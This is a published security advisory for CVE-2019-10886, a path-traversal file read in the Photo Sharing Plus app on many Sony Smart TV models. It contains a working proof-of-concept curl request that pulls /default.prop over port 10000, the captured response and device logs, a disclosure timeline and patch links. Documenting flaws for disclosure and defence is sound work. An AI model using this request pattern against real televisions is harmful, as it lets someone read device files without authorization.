Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

23 April 2019

 

CVE

 

CVE-2019-10886

 

XID

 

XL-19-002

 

CVSS SCORE

 

6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

 

AFFECTED VENDORS

 

Sony

 

AFFECTED SYSTEMS  

 

 

 

 

 

 

 

 

 

 

 

Sony Smart TVs (non-exhausted list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E

 

VULNERABILITY SUMMARY    

 

 

 

 

The “Photo Sharing Plus” application running inside the Smart TV functionality is to upload photos from a smartphone to the TV, in order to display on the television screen. When the application is launched, it allows the TV to be a Wi-Fi access point and displays the Wi-Fi password allowing to authenticate and share media content on the Sony Smart TV.

This vulnerability allows an attacker to read arbitrary files located on the file-system of the TV without authentication, including valuable files.

 

TECHNICAL DETAILS

 

 

 

 

 

 

 

 

 

This vulnerability allows an attacker to retrieve internal files located inside the TV file system, without authentication.

By default, images used by the Photo Sharing Plus application are stored inside ‘/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/’. The application initiates an access point on the television and a HTTP daemon is listening to a TCP port on the newly created WLAN.

Furthermore, this daemon also listens on the LAN side of the television and it is possible to retrieve these images from the LAN an image using this URL:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing to the web address http://[ip_tv]:10000/contentshare/image/ allows access to the root directory of the television running Android.

 

PROOF OF CONCEPT

 

By exploiting this vulnerability, ‘/default.prop’ (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop

 

 

 

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop

Trying 192.168.1.102...

TCP_NODELAY set

Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)

> GET /contentshare/image/default.prop HTTP/1.1

> Host: 192.168.1.102:10000

> User-Agent: curl/7.58.0

> Accept: /

< HTTP/1.1 200 OK

< Connection: close

< Content-Length: 591

< Content-Type: application/octet-stream

#

# ADDITIONAL_DEFAULT_PROPERTIES

#

ro.secure=1

security.perf_harden=1

ro.allow.mock.location=0

ro.debuggable=0 ro.zygote=zygote32

dalvik.vm.image-dex2oat-Xms=64m

dalvik.vm.image-dex2oat-Xmx=64m

dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m

ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0

#

# BOOTIMAGE_BUILD_PROPERTIES

#

ro.bootimage.build.date= 2016年 11月 14日 月曜日 15:34:56 JST ro.bootimage.build.date.utc= 1479105296 ro.bootimage.build.fingerprint= Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00: user/release-keys persist.sys.usb.config= none

 

Closing connection 0 

 

 

Device logs confirm the ‘/default.prop’ file has been delivered over HTTP: 

 

 

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591

07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed

TIMELINE 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

03/10/2018 – Vulnerabilities found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms the vulnerabilities

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to xen1thLabs talk at HiTB Dubai 2018 as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thlabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to Secure@Sony.com due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory  

21/03/2019 – Automatic response from Secure@Sony.com is no more in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affect a range of models and “Sony plans to terminate Photo Sharing Plus service for all of the models, and that completion date is scheduled for April 12th, 2019.”

23/04/2019 – Public disclosure

 

SOLUTION

 

  

 

 

 

 

 

 

 

Apply patches provided by Sony 

Firmware update to v6.5830 from 01-22-2019 (including security patches?)

https://www.sony.com/electronics/support/downloads/00015771

 

Firmware update to v6.5830 from 01-22-2019 (not including security patches)

https://www.sony.com/electronics/support/downloads/00015770

 

End of Photo Sharing Plus 11/22/2018

https://www.sony.com/electronics/support/articles/00204331

 

CREDIT

 

xen1thLabs - Telecom Lab